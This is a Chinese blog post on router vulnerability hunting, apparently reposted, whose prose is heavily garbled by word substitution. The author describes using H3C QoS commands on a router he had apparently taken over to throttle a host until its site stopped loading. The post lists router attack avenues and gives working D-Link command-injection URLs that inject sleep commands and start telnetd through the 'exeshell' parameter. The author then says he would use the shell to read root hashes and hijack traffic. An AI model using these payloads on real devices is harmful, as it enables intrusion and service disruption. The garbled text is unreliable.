|
|
|
联系客服020-83701501

浅谈路由器漏洞挖掘(科普文)

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
浅谈路由器裂痕掘客(科普文)

想在国内找一些路由渗透的纪实,但还是木有甚么后果,便是今晚给国内某路由厂商提交一些裂痕时,还被人家蔑视了,哎。甚么狗屁心态。不管了,留给我将来的 儿子玩吧。说不定概略搞出甚么东西。呵呵,扯远了,今晚就拆散国内的一些科普文做一些教学吧。大牛别喷我,我也只是自身写写笔记意淫意淫….别喷!

++++++我是淫荡的朋分线++++++++

一,为甚么要定义零丁的路由安全?

(1)对于渗透湿而言:

平常,更多的渗透湿凡是重在于网站层的渗透,总是颠末各种大杀器拿下内网呆滞权限,尔后各种嗅探,但半先天发明,坑!内网划分了vlan 。(tip:VLAN(Virtual Local Area Network)的中文名为”假造局域网”。VLAN是一种将局域网设备从逻辑上划分成一个个网段,从而实现假造任务组的新兴数据变动技能。这一新兴技能 主要应用于变动机和路由器中,但支流应用还是在变动机之中。)对于到这一层,良多人凡是连结了,能够去换了其余奇技淫巧,更是APT.但往往咱们的收获却 是很少很少,对于那些白帽做内网的受权渗透时,网站服务器的数目更是越来越少,但因为公司对员工的打点以及安全安放,更是划分了各种vlan维护数据的 安全和员工的限制。有些对数据痴钝的公司,为了警醒来公司观摩的指导和乘客划连系别了wifi 的vlan,这是为甚么?原本越多渠道颠末wifi和路由安全这个平台向内网的数据伸手,由wifi到核心数据盗取的案例已经良多了,手法凡是差未几的, 你懂的。

(2)对于打点员而言:

路由器和变动机,还有硬防只是个用来联网的设备,而这些也往往是标题的地址,平常的打点员更多投入在服务器的安全上,网站翻开慢?mysql发包 数没设置好吧!无意偶尔开的无意偶尔卡?论坛插件太痴肥了吧!乃至是监控平台,都仅仅是写细碎的违拗环境。。却没存眷路由的安全。你会说,靠,傍晚,扯了半天,你 还是没把我的站日下….我给我自身划了个vlan,vps用了某某宝放慢,还用某某狗看门,看你怎么进,跟你说喔,上周某某宝还举办比赛,尔后增加了良多 规定,我看你怎么绕。。。??????看到这里,我也立时语塞,难度好大…..

换一种设施程序,找到另一个vlan,没狗狗,没宝宝的,尔后提权……颠末号令识别路由类型和型号,开首在网上找到路由裂痕的exp,拿到路由权限…(ps:这里环境良多,有三层变动机的,还有留神个中的树协定 )

尔后便是限速啦~!这里便是h3c的限速规定

# 配置ACL规定成婚源IP为10.0.0.2的流量

Default
1234 <H3C> system-view[H3C] acl number 3001[H3C-acl-adv-3001] rule permit ip source 10.0.0.2 0[H3C-acl-adv-3001] quit

 

# 配置ACL规定成婚目标IP为10.0.0.20的流量

Default
123 [H3C] acl number 3002[H3C-acl-adv-3002] rule permit ip destination 10.0.0.2 0[H3C-acl-adv-3002] quit

 

# 配置流分类,成婚ACL规定3001,即成婚源IP为10.0.0.20的流量

Default
123 [H3C] traffic classifier source_hostA[H3C-classifier-source_hostA] if-match acl 3001[H3C-classifier-source_hostA] quit

 

# 配置流分类,成婚ACL规定3002,即成婚目标IP为10.0.0.20的流量

Default
123 [H3C] traffic classifier destination_hostA[H3C-classifier-destination_hostA] if-match acl 3002[H3C-classifier-destination_hostA] quit

 

# 配置流举动,用于对上行流量截止流量羁系,速度为100kbps

Default
123 [H3C] traffic behavior uplink[H3C-behavior-uplink] car cir 100[H3C-behavior-uplink] quit

 

# 配置流举动,用于对下行流量截止流量羁系,速度为100kbps

Default
123 [H3C] traffic behavior downlink[H3C-behavior-downlink] car cir 100[H3C-behavior-downlink] quit

 

# 配置QoS战略,用于端口入标的目标,即用户的上行标的目标

Default
123 [H3C] qos policy uplink[H3C-qospolicy-uplink] classifier source_hostA behavior uplink[H3C-qospolicy-uplink] quit

# 配置QoS战略,用于端口出标的目标,即用户的下行标的目标

Default
123 [H3C] qos policy downlink[H3C-qospolicy-downlink] classifier destination_hostA behavior downlink[H3C-qospolicy-downlink] quit

 

# 在端口凹凸发QoS战略,成婚收支标的目标的流量

Default
123 [H3C] interface GigabitEthernet 3/0/1[H3C-GigabitEthernet3/0/1] qos apply policy uplink inbound[H3C-GigabitEthernet3/0/1] qos apply policy downlink outbound

 

尔后处于内网的10.0.0.20 ,上传只要1kb 下载只要1kb 了,网站就多么开不了然

劈头阿谁机油以为我爆了dns的菊花,但后果并不是,DDOS?我一个小菜怎么肯无能掉某宝宝。。。开首陈述他是我改了中控路由。。。最开首怎么 办,只好协同机房的机油一块儿修补了这个洞…..设施程序便是 更新路由器固件 。简单点说法,便是给路由器刷机….点到即止。。只要拿到了路由权限概略干良多事宜!!!因为你手里控制着部门机房的流量…你说流量无能吗???

建议你去看看刺总的文章,内中猛戳 这里??互联网如何亏蚀????http://taosay.net/?p=506

二.空话后的冰J凌

(1)好热的天….扯了这么多空话,再次回到路由器的构架上….

非论何时何地,路由器的配置总是最低的 一般凡是4~128MB的内存??4M能够8MB的闪存,还有80~900HZ的处置惩罚器,哎,当初的手机处置惩罚器动不动便是双核1.5GHz 完爆路由器配置啊,但是路由器只是作为一个举动打点和流量,协定处置惩罚的呆滞,并不需要太多的页面于用户截止交互,所以,没有所以了,大部蹊径由器凡是接纳 linux细碎,所以良多时辰概略颠末内核裂痕截止长途溢出能够其余设施程序提权。

(2) 默认密码,差别路有密码纷歧样…还有一些路由返厂密码…唉,应用设施程序后边会介绍的

(3) 默认的telnet

(4) 凋谢的端口

Default
12345 PORT    STATE SERVICE21/tcp  open  ftp80/tcp  open  http139/tcp open  netbios-ssn445/tcp open  microsoft-ds

(5) 呵呵,小气的时辰,能打仗到实体机,概略自身改装JTAG接口间接读数据…啪啪啪

(6) Web登岸界面的burp爆破…你懂的

(7) 良多地方没有过滤,概略用良多姿势拔出代码(xss)

(8) 打点员认证绕过

(9) 长途号令执行….啪啪啪

(10) perl有着“taint mode” php输入未认证和过滤

(11) 网站和路由器往往与JS考据输入,而不因此后GET / POST

(12) 颠末劫持输入源,并加以应用,例如说QQ空间载入的第一个跳转。。呵呵,你懂的

(13) 目录遍历,password文件下载

以上凡是总结出来的…

下边来个实例 D-LINK的….

例如说 ping测试,概略被细碎间接调用,和输入,但这里木有过滤

Default
1 http://192.168.0.1/tools_vct.php?pingIP=192.168.0.1

 

咱们概略用这种姿势拔出

例如说让路由器进入休眠状态,后入!后入30个休眠号令

Default
1 http://192.168.0.1/tools_vct.php?pingIP=127.0.0.1%3B%20sleep,2030%

 

个中要插手个空格,转成20% ,良多时辰做路由渗透测试,没有截止原义,导致没有执行败北就以为没有洞….我就是以错过了几个,诚尔后边自身也发明白,所以在这揭示一下本人??:D

睡前再来条黄瓜吧,这条黄瓜便是

http://192.168.0.1/tools_system.php

它或者重启路由器,也便是能被细碎间接调用,厥后咱们在路由器固件里发明白应用的js

Default
1 http://192.168.0.1/sys_config_valid.xgi?exeshell=submit%20REBOOT

 

唉,就像是csrf+长途号令执行

exeshell是一个尤其淫荡的变量名

还概略多么继续拔出,啪啪啪,路由器休眠了

Default
1 http://192.168.0.1/sys_config_valid.xgi?exeshell =%60sleep 30%60

 

呵呵,你又劈头蔑视我了???????? 屌丝傍晚,你除了会关我路由器你还无能吗?你除了会啪啪啪还会甚么?

前边提到了exeshell是一个尤其淫荡的变量名

尔后咱们多么拔出

Default
1 http://192.168.0.1/sys_config_valid.xgi?exeshell =%60telnetd%60

 

尔后你的telnet就翻开了,我无能啥???你说我无能啥??我还无能啥?间接用这个exeshell读取root的hash值,尔后啪啪啪进入你的telnet,装个改装版的nc,间接截止流量劫持….我觉得这个才是真正的流量劫持啊……

总结

看了这篇文章你必定会问,屌丝傍晚,有木有路由渗透的大杀器,我的答复是,有!但是很少,例如说BT5,msf里边都有,还有routeker渗透套件,不过估计routeker还需要好久才会颁发,这里就推荐一款国内的吧

Routerpwn

Routerpwn渗透测试是一种住宅的路由器的安全审计东西。

这是一个编译运转本地和长途网络攻击的筹办。 JavaScript和HTML编程以运转在部门的“智高手机和移动互联网设备。您概略利用本地开采离线没有互联网毗邻。 您概略改革,目标IP地址,点击[IP]链接旁边的裂痕。

个中概略应用

DNS-320的D-Link DNS-325执行号令
DNS-320的D-Link DNS-325的信息暴露
DNS-320的D-Link DNS-325的信息暴露
TRENDNET TV-IP摄像机绕过认证

还有甚么缺的地方本人提出来一块儿探讨吧??:D

91ri.org:未几说,赞。

link:http://www.arc5ch.com/archives/510

本文由网络安全攻防研讨室(www.91ri.org)信息安全小组收集整顿,转载请阐明来由。

数安新闻+更多

证书相关+更多